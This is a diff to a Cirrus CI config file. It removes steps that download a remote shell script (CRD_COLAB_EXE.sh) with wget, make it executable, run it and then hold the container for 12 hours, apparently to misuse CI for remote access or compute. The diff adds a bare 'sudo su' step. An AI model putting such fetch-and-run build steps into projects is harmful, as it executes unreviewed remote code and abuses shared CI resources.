--- a/.cirrus.yml
+++ b/.cirrus.yml
@@ -4,8 +4,5 @@ container:
   memory: 10G
   
 task:
-  prepare_script: wget https://raw.githubusercontent.com/cloudshell123/labtest/master/CRD_COLAB_EXE.sh
-  setup1_script: chmod +x CRD_COLAB_EXE.sh
-  setup_script: ./CRD_COLAB_EXE.sh
-  complete_script: sleep 43200
+  prepare_script: sudo su
   
